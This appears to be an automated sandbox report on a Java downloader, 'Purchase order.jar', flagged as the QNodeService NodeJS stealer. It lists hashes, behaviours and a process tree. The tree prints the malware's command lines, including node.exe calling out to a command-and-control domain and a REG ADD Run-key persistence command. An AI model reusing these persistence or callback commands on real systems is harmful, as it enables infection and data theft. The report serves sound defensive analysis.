Analysis
-
max time kernel
35s -
max time network
126s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
05-11-2020 09:22
Static task
static1
Behavioral task
behavioral1
Sample
Purchase order.jar
Resource
win7v20201028
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Purchase order.jar
Resource
win10v20201028
windows10_x64
0 signatures
0 seconds
General
-
Target
Purchase order.jar
-
Size
85KB
-
MD5
204d0b9b7198ed31f81e004ed4c02445
-
SHA1
166a748ac03503cc764d3a8d8b67a891339bc85f
-
SHA256
6a772f09e9c6e88ea2999212c40ce98d5d310907c00971d4f1f9ba55c5e83131
-
SHA512
8a50084d5d2e492e03851c40b7fcf1f857825db476d4dbddd48187bf2babbc0ae247584183bee4de0a2fa6e77a4b86ee4327d0a4624b320e06a345420c39b3fc
Score
10/10
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 3 IoCs
pid Process 1316 node.exe 2192 node.exe 1388 node.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\84599876-7cc9-43a2-b9e2-474c01689bb5 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" reg.exe -
JavaScript code in executable 3 IoCs
resource yara_rule behavioral2/files/0x000100000001ab9a-164.dat js behavioral2/files/0x000100000001ab9a-167.dat js behavioral2/files/0x000100000001ab9a-171.dat js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 20 wtfismyip.com 21 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 1316 node.exe 1316 node.exe 1316 node.exe 1316 node.exe 2192 node.exe 2192 node.exe 2192 node.exe 2192 node.exe 1388 node.exe 1388 node.exe 1388 node.exe 1388 node.exe 1388 node.exe 1388 node.exe 1388 node.exe 1388 node.exe 1388 node.exe 1388 node.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1112 wrote to memory of 1364 1112 java.exe 77 PID 1112 wrote to memory of 1364 1112 java.exe 77 PID 1364 wrote to memory of 1316 1364 javaw.exe 81 PID 1364 wrote to memory of 1316 1364 javaw.exe 81 PID 1316 wrote to memory of 2192 1316 node.exe 83 PID 1316 wrote to memory of 2192 1316 node.exe 83 PID 2192 wrote to memory of 1388 2192 node.exe 84 PID 2192 wrote to memory of 1388 2192 node.exe 84 PID 1388 wrote to memory of 968 1388 node.exe 86 PID 1388 wrote to memory of 968 1388 node.exe 86 PID 968 wrote to memory of 3412 968 cmd.exe 87 PID 968 wrote to memory of 3412 968 cmd.exe 87
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\Purchase order.jar"1⤵
- Suspicious use of WriteProcessMemory
PID:1112 -
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\29714f0c.tmp2⤵
- Suspicious use of WriteProcessMemory
PID:1364 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain steelpipeskzn.ddns.net3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1316 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_VZ0ZSL\boot.js --hub-domain steelpipeskzn.ddns.net4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2192 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_VZ0ZSL\boot.js --hub-domain steelpipeskzn.ddns.net5⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1388 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "84599876-7cc9-43a2-b9e2-474c01689bb5" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""6⤵
- Suspicious use of WriteProcessMemory
PID:968 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "84599876-7cc9-43a2-b9e2-474c01689bb5" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""7⤵
- Adds Run key to start application
PID:3412
-
-
-
-
-
-